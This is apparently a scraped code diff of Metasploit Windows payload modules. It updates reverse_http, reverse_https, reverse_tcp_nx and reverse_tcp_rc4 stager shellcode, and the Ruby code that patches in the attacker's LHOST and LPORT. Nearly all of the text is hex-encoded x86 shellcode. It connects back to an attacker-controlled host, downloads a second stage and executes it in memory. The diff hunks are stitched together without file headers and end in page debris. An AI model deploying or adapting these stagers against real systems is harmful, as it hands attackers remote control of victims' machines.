"\x14\x07\x86\x14\x1F\x88\x14\x07\xFE\xC0\x75\xE8\x31\xDB\xFE\xC0" +
"\x02\x1C\x07\x8A\x14\x07\x86\x14\x1F\x88\x14\x07\x02\x14\x1F\x8A" +
"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" +
"\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" +
"\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" +
"\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" +
"\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x81" +
"\xF6\x58\x4F\x52\x4B\x8D\x0E\x6A\x40\x68\x00\x10\x00\x00\x51\x6A" +
"\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x8D\x98\x00\x01\x00\x00\x53\x56" +
"\x50\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29" +
"\xC6\x85\xF6\x75\xEC\x5B\x59\x5D\x55\x57\x89\xDF\xE8\x10\x00\x00" +
"\x00\x52\x43\x34\x4B\x65\x79\x4D\x65\x74\x61\x73\x70\x6C\x6F\x69" +
"\x74\x5E\x31\xC0\xAA\xFE\xC0\x75\xFB\x81\xEF\x00\x01\x00\x00\x31" +
"\xDB\x02\x1C\x07\x89\xC2\x80\xE2\x0F\x02\x1C\x16\x8A\x14\x07\x86" +
"\x14\x1F\x88\x14\x07\xFE\xC0\x75\xE8\x31\xDB\xFE\xC0\x02\x1C\x07" +
"\x8A\x14\x07\x86\x14\x1F\x88\x14\x07\x02\x14\x1F\x8A\x14\x17\x30" +
@ -29,30 +29,37 @@ module Metasploit3
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 290, 'V' ],
'LPORT' => [ 190, 'v' ], # Not a typo, really little endian
'LPORT' => [ 180, 'v' ], # Not a typo, really little endian
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
"\x52\x68\x00\x02\x60\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
"\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
"\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
# Built on Tue Feb 4 11:36:42 2014
# Name: stager_reverse_http
# Length: 317 bytes
# LEPort Offset: 180
# ExitFunk Offset: 238
"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x6E\x65" +
"\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31" +
"\xDB\x53\x53\x53\x53\x53\x68\x3A\x56\x79\xA7\xFF\xD5\x53\x53\x6A" +
"\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x3A\x50\x68\x57\x89\x9F\xC6" +
"\xFF\xD5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xEB\x29\x53\x50\x68" +
"\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x5F\x53\x53\x53\x53\x56\x68" +
"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x18\x4F\x75\xED\x68\xF0\xB5" +
"\xA2\x56\xFF\xD5\xEB\x42\xE8\xD2\xFF\xFF\xFF\x2F\x31\x32\x33\x34" +
"\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68" +
"\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00" +
"\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xBF\x8B\x07" +
@ -29,32 +29,38 @@ module Metasploit3
# Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now)
# 'EXITFUNC' => [ 290, 'V' ],
'LPORT' => [ 190, 'v' ], # Not a typo, really little endian
'LPORT' => [ 180, 'v' ], # Not a typo, really little endian
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
# Built on Tue Feb 4 11:36:42 2014
# Name: stager_reverse_https
# Length: 337 bytes
# LEPort Offset: 180
# ExitFunk Offset: 258
"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
"\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
"\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x68\x80\x33\x00\x00\x89\xE0\x6A" +
"\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x31\xFF\x57\x57" +
"\x57\x57\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74" +
"\x10\xEB\xD5\xEB\x49\xE8\xB3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" +
"\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68" +
"\x00\x00\x40\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89" +
"\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5" +
"\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x51" +
"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x6E\x65" +
"\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31" +
"\xDB\x53\x53\x53\x53\x53\x68\x3A\x56\x79\xA7\xFF\xD5\x53\x53\x6A" +
"\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x4E\x50\x68\x57\x89\x9F\xC6" +
"\xFF\xD5\x53\x68\x00\x32\xE0\x84\x53\x53\x53\xEB\x3D\x53\x50\x68" +
"\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x5F\x68\x80\x33\x00\x00\x89" +
"\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x53\x53" +
"\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x18\x4F\x75" +
"\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\xEB\x42\xE8\xBE\xFF\xFF\xFF\x2F" +
"\x31\x32\x33\x34\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" +
"\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" +
"\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" +
"\x74\xBF\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x69\xFF\xFF" +
@ -100,7 +100,7 @@ module Metasploit3
p[proxyloc-4] = [calloffset].pack('V')[0]
#Optional authentification
if (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
if (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
(datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
datastore['PROXY_TYPE'] == 'SOCKS'
@ -110,7 +110,7 @@ module Metasploit3
username_size_diff = 14 - datastore['PROXY_USERNAME'].length
password_size_diff = 14 - datastore['PROXY_PASSWORD'].length
jmp_offset = 16 + #PROXY_AUTH_START length
jmp_offset = 16 + #PROXY_AUTH_START length
15 + #PROXY_AUTH_STOP length
username_size_diff + # difference between datastore PROXY_USERNAME length and db "PROXY_USERNAME length"
password_size_diff # same with PROXY_PASSWORD
@ -132,7 +132,7 @@ module Metasploit3
p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
# patch the LPORT
lport = bind_port
lport = datastore['LPORT']
lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444
p[lportloc+1] = [lport.to_i].pack('V')[0]
@ -142,7 +142,7 @@ module Metasploit3
# append LHOST and return payload
lhost = bind_address
lhost = datastore['LHOST']
p + lhost.to_s + "\x00"
@ -154,32 +154,5 @@ module Metasploit3
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "" or addrs == "::0")
@ -26,28 +26,35 @@ module Metasploit3
'Stager' =>
'RequiresMidstager' => false,
'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] },
'Offsets' => { 'LHOST' => [ 194, 'ADDR' ], 'LPORT' => [ 201, 'n' ], 'ReverseConnectRetries' => [ 192, 'C'] },
'Payload' =>
# Length: 290 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
# Built on Tue Jan 14 03:04:51 2014
# Name: stager_reverse_tcp_nx
# Length: 287 bytes
# Port Offset: 201
# Host Offset: 194
# RetryCounter Offset: 192
# ExitFunk Offset: 226
"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6" +
"\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF" +
"\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56" +
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00" +
"\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56" +
"\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75" +
"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" +
"\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
"\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" +
"\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" +
"\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" +
"\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" +
@ -33,40 +33,48 @@ module Metasploit3
'RequiresMidstager' => false,
'Offsets' =>
'LHOST' => [ 197, 'ADDR' ],
'LPORT' => [ 204, 'n' ],
'ReverseConnectRetries' => [ 195, 'C'],
'XORKey' => [ 252, '' ],
'RC4Key' => [ 316, '' ],
'LHOST' => [ 194, 'ADDR' ],
'LPORT' => [ 201, 'n' ],
'ReverseConnectRetries' => [ 192, 'C'],
'XORKey' => [ 249, '' ],
'RC4Key' => [ 313, '' ],
'Payload' =>
# Length: 403 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
# Name: stager_reverse_tcp_rc4
# Length: 400 bytes
# Port Offset: 201
# Host Offset: 194
# RetryCounter Offset: 192
# ExitFunk Offset: 226
# RC4Key Offset: 313
# XORKey Offset: 249
"\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x97\x6A\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6" +
"\x6A\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF" +
"\x4E\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56" +
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x81\xF6\x58\x4F\x52\x4B" +
"\x8D\x0E\x6A\x40\x68\x00\x10\x00\x00\x51\x6A\x00\x68\x58\xA4\x53" +
"\xE5\xFF\xD5\x8D\x98\x00\x01\x00\x00\x53\x56\x50\x6A\x00\x56\x53" +
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC" +
"\x5B\x59\x5D\x55\x57\x89\xDF\xE8\x10\x00\x00\x00\x52\x43\x34\x4B" +
"\x65\x79\x4D\x65\x74\x61\x73\x70\x6C\x6F\x69\x74\x5E\x31\xC0\xAA" +
"\xFE\xC0\x75\xFB\x81\xEF\x00\x01\x00\x00\x31\xDB\x02\x1C\x07\x89" +
"\xC2\x80\xE2\x0F\x02\x1C\x16\x8A\x14\x07\x86\x14\x1F\x88\x14\x07" +
"\xFE\xC0\x75\xE8\x31\xDB\xFE\xC0\x02\x1C\x07\x8A\x14\x07\x86\x14" +
"\x1F\x88\x14\x07\x02\x14\x1F\x8A\x14\x17\x30\x55\x00\x45\x49\x75" +
"\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" +
"\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" +
"\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" +
"\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" +
"\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" +
"\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" +
"\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" +
"\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
"\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" +
"\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" +
"\xD9\xC8\x5F\xFF\xD5\x8B\x36\x81\xF6\x58\x4F\x52\x4B\x8D\x0E\x6A" +
"\x40\x68\x00\x10\x00\x00\x51\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" +
"\x8D\x98\x00\x01\x00\x00\x53\x56\x50\x6A\x00\x56\x53\x57\x68\x02" +
"\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\x5B\x59\x5D" +
"\x55\x57\x89\xDF\xE8\x10\x00\x00\x00\x52\x43\x34\x4B\x65\x79\x4D" +
"\x65\x74\x61\x73\x70\x6C\x6F\x69\x74\x5E\x31\xC0\xAA\xFE\xC0\x75" +
"\xFB\x81\xEF\x00\x01\x00\x00\x31\xDB\x02\x1C\x07\x89\xC2\x80\xE2" +
"\x0F\x02\x1C\x16\x8A\x14\x07\x86\x14\x1F\x88\x14\x07\xFE\xC0\x75" +
"\xE8\x31\xDB\xFE\xC0\x02\x1C\x07\x8A\x14\x07\x86\x14\x1F\x88\x14" +
Reference in New Issue